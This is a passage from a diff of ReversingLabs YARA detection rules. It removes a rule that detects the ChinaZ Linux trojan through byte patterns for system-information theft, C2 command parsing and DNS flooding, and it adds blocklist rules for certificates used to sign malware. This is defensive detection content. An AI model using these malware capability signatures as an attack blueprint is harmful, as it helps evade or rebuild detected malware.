?? 48 8B 4C - 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B0 ?? EB ?? 32 C0 48 81 C4 - ?? ?? ?? ?? 5B C3 - } - condition: - uint16(0)==0x5A4D and ($generate_system_id) and ($generate_encrypt_and_send_key) and ($get_encrypt_and_send_system_info) and ($copy_payload_into_allocated_memory) and ($execute_payload_from_temp) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\"VERONIKA 2\" OOO" and (pe.signatures[i].serial=="00:e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" or pe.signatures[i].serial=="e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68") and 1563148800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Linux_Trojan_Chinaz : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_B06Bc166Fc765Dacd2F7448C8Cdd9205 : INFO FILE { meta: - description = "Yara rule that detects ChinaZ trojan." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f99c224b-db54-5cae-b5fb-8939ebee3250" - date = "2024-07-31" - modified = "2024-07-31" + id = "4b27c958-58f1-5fbd-8a39-aedfe4dafe39" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/Linux.Trojan.ChinaZ.yara#L1-L246" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d8d08f4f3f36ecc7b219b6b1aae3c76d26e8fb3a44444763929190c6124532ff" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12178-L12196" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2c47166f02c7f94bb4f82296e3220ff7ca3c6c53566d855b2fe77cb842a5fb43" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "ChinaZ" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $collect_system_information_32_p1 = { - 55 57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? - ?? 89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 31 C9 89 C6 8D 44 24 ?? 31 - FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44 24 ?? 11 D3 C7 44 24 ?? ?? ?? ?? - ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? - 29 F1 19 FB 31 ED 2B 44 24 ?? 89 4C 24 ?? 8D B4 24 ?? ?? ?? ?? 89 5C 24 ?? 89 F7 69 - C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24 - ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B - 5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? - 8D 9C 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1 - } - $collect_system_information_32_p2 = { - C7 04 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 - DF B1 ?? F3 AB 89 DF 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 54 24 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 F7 C7 44 24 ?? ?? ?? ?? ?? 89 D0 - C1 F8 ?? C1 E8 ?? 01 D0 C1 F8 ?? 89 44 24 ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C2 A1 ?? ?? ?? - ?? 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 E8 B9 ?? ?? ?? ?? F3 AB 89 DF B1 ?? F3 - AB 89 5C 24 ?? 89 74 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 0F - 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? - ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? - ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D - C3 - } - $send_system_info_32 = { - 57 56 53 81 EC ?? ?? ?? ?? 8D 5C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? - 89 44 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 0F 31 31 C9 89 C6 8D 44 24 ?? 31 FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8 - ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44 - 24 ?? 11 D3 C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? - 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 29 F1 19 FB 2B 44 24 ?? 89 4C 24 ?? 89 5C 24 ?? 69 - C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24 - ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B - 5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? - C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F C3 - } - $parse_c2_commands_32 = { - 55 31 C0 57 B9 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 0F B6 94 24 - ?? ?? ?? ?? 89 DF F3 AB C7 04 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 83 E0 ?? 89 84 24 ?? ?? ?? ?? 90 A1 ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 E8 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 89 74 24 ?? - C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F - 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 - ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? - ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB - 8D B4 24 ?? ?? ?? ?? B0 ?? 8D BC 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? B1 ?? F3 A5 89 - D6 8B BC 24 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85 - ?? ?? ?? ?? 89 C1 C1 E9 ?? A8 ?? F3 A5 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 89 - 54 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? - 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3 - } - $dns_flood_32_p1 = { - 55 57 56 53 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? 8B - B4 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? F6 C3 ?? 89 DF 0F 85 ?? ?? ?? ?? 89 C1 C1 E9 ?? A8 - ?? F3 A5 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? - 89 F7 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? F7 35 ?? ?? ?? - ?? 8B 04 95 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 C5 8D - 44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 AB 8D 54 24 ?? - 89 14 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 84 24 ?? - ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? - ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 14 24 89 74 24 ?? 89 54 24 ?? C6 84 24 ?? ?? ?? ?? - ?? C6 84 24 ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? - ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 - } - $dns_flood_32_p2 = { - 24 ?? 89 D1 8B 39 83 C1 ?? 8D 87 ?? ?? ?? ?? F7 D7 21 F8 25 ?? ?? ?? ?? 74 ?? A9 ?? - ?? ?? ?? 0F 84 ?? ?? ?? ?? 00 C0 89 D7 83 D9 ?? 29 D1 8D 84 0C ?? ?? ?? ?? 66 C7 00 - ?? ?? 66 C7 40 ?? ?? ?? 8B 0F 83 C7 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? - 74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 00 C0 8D 44 24 ?? 83 DF ?? C7 44 24 ?? - ?? ?? ?? ?? 29 D7 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 74 - 24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 89 14 24 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 94 24 ?? ?? ?? ?? 89 5C 24 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? - 83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C7 ?? 89 C2 - C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 2C 24 F7 35 ?? ?? ?? ?? - 8B 04 95 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44 - 24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 80 ?? ?? ?? ?? ?? 83 90 ?? ?? ?? ?? ?? - 83 3D ?? ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8 - } - $collect_system_information_64_p1 = { - 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ?? - ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? - ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? - ?? 0F 31 48 89 D3 48 8D 7C 24 ?? 31 F6 48 C1 E3 ?? 89 C0 48 01 C3 E8 ?? ?? ?? ?? BF - ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24 ?? 31 F6 48 C1 E5 ?? 89 C0 45 - 31 E4 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 44 24 ?? 48 29 DD 48 8B 54 24 ?? - 2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 48 8D AC 24 ?? ?? ?? ?? 69 C0 ?? ?? ?? ?? - 01 D0 F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ?? - ?? ?? ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05 - ?? ?? ?? ?? BF ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE - ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3 48 AB - } - $collect_system_information_64_p2 = { - 48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 - ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9 - ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 44 24 ?? BE ?? ?? ?? ?? 48 89 DF 8D 90 ?? ?? ?? ?? - 85 C0 0F 49 D0 31 C0 C1 FA ?? 89 54 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE BF - ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE ?? - ?? ?? ?? BF ?? ?? ?? ?? 41 89 C5 E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3 - 48 AB 48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 85 - ED 75 ?? BA ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? - E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF - ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? 31 C9 - BA ?? ?? ?? ?? 31 F6 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D C3 - } - $send_system_info_64 = { - 55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 - 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ?? - ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D3 31 F6 48 89 E7 48 C1 E3 ?? 89 - C0 48 01 C3 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24 - ?? 31 F6 89 C0 48 C1 E5 ?? 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 04 24 48 29 - DD 48 8B 54 24 ?? 2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 69 C0 ?? ?? ?? ?? 01 D0 - F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ?? ?? ?? - ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? BA ?? ?? ?? ?? - BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? BA ?? ?? ?? ?? - BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5D C3 - } - $parse_c2_commands_64 = { - 41 57 31 C0 49 89 FF B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 - 8D 9C 24 ?? ?? ?? ?? 40 88 B4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D A4 24 ?? - ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 DF F3 48 AB C7 07 ?? ?? ?? ?? BF ?? ?? ?? ?? - E8 ?? ?? ?? ?? 48 8D 43 ?? 48 89 84 24 ?? ?? ?? ?? 0F 1F 00 8B 3D ?? ?? ?? ?? 31 C9 - BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B B4 24 ?? ?? - ?? ?? 45 85 F6 0F 84 ?? ?? ?? ?? 31 C0 44 89 F6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84 - 24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? - ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? - ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 85 - ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 48 AB 48 8B 84 24 ?? ?? - ?? ?? 4C 8B 9C 24 ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B - 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? - 48 8B 84 24 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 94 24 - ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? - 48 8B AC 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 - ?? ?? ?? ?? 4C 89 9C 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? - 4C 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24 - ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? - 4C 89 A4 24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 - ?? ?? ?? ?? 49 89 57 ?? 48 8B 94 24 ?? ?? ?? ?? 49 89 77 ?? 48 8D B4 24 - } - $dns_flood_64_p1 = { - 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 49 89 - FC BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 89 D9 4C 89 E6 48 8D AC 24 ?? ?? ?? ?? F3 48 A5 - 8B 06 48 89 CB 89 07 0F B7 46 ?? 8B 35 ?? ?? ?? ?? 66 89 47 ?? BF ?? ?? ?? ?? 31 C0 - E8 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 C7 04 24 ?? ?? - 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? F7 35 ?? ?? - ?? ?? 89 D2 8B 04 95 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ?? - ?? ?? 48 89 E6 89 C7 41 89 C5 E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ?? ?? 48 89 EF F3 48 - AB 48 8D 7C 24 ?? BE ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? - 48 8D 7D ?? 48 8D 74 24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? 00 - 00 E8 ?? ?? ?? ?? 48 89 EE 48 89 DF C6 84 24 ?? ?? ?? ?? ?? C6 84 24 - } - $dns_flood_64_p2 = { - 66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00 - ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? E8 ?? ?? ?? ?? 48 89 D9 8B 01 48 83 C1 ?? 8D 90 - ?? ?? ?? ?? F7 D0 21 C2 81 E2 ?? ?? ?? ?? 74 ?? 89 D0 C1 E8 ?? F7 C2 ?? ?? ?? ?? 0F - 44 D0 48 8D 41 ?? 48 0F 44 C8 00 D2 48 83 D9 ?? 48 29 D9 48 8D 84 0C ?? ?? ?? ?? 48 - 8D 8C 24 ?? ?? ?? ?? 66 C7 00 ?? ?? 66 C7 40 ?? ?? ?? 48 89 CB 8B 13 48 83 C3 ?? 8D - 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 48 8D 7C 24 ?? BE ?? ?? ?? ?? - C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 53 ?? 48 0F 44 DA 00 C0 48 83 DB ?? 48 29 CB - E8 ?? ?? ?? ?? 8B 44 24 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 EE 89 84 24 ?? ?? ?? ?? 0F - B7 44 24 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 7D ?? 48 8D 74 24 ?? E8 ?? - ?? ?? ?? 41 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 B9 ?? ?? - ?? ?? 83 C3 ?? C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ?? - ?? ?? 31 D2 48 8D B4 24 ?? ?? ?? ?? 31 C9 F7 35 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 - E0 44 89 EF 89 D2 8B 04 95 ?? ?? ?? ?? 48 63 D3 89 44 24 ?? E8 ?? ?? ?? ?? 49 83 84 - 24 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? BF ?? ?? ?? ?? E8 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GAS Avto, d.o.o." and (pe.signatures[i].serial=="00:b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" or pe.signatures[i].serial=="b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05") and 1615507200<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "a93b0a98-cfec-5e32-9fd8-b3d6c4353558" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12198-L12216" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fc840c0b37867c3b0aa80d4dc609feaaab77d3f0c6f84c8bb2ea7c5a6461ebb8" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint32(0)==0x464C457F and ((( all of ($collect_system_information_32_p*)) and ($send_system_info_32) and ($parse_c2_commands_32) and ( all of ($dns_flood_32_p*))) or (( all of ($collect_system_information_64_p*)) and ($send_system_info_64) and ($parse_c2_commands_64) and ( all of ($dns_flood_64_p*)))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Casta, s.r.o." and (pe.signatures[i].serial=="00:e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" or pe.signatures[i].serial=="e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18") and 1647302400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Namaste : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : INFO FILE { meta: - description = "Yara rule that detects Namaste ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e85d7ec3-367b-5bde-a570-8caa1f6cd61b" - date = "2021-08-12" - modified = "2021-08-12" + id = 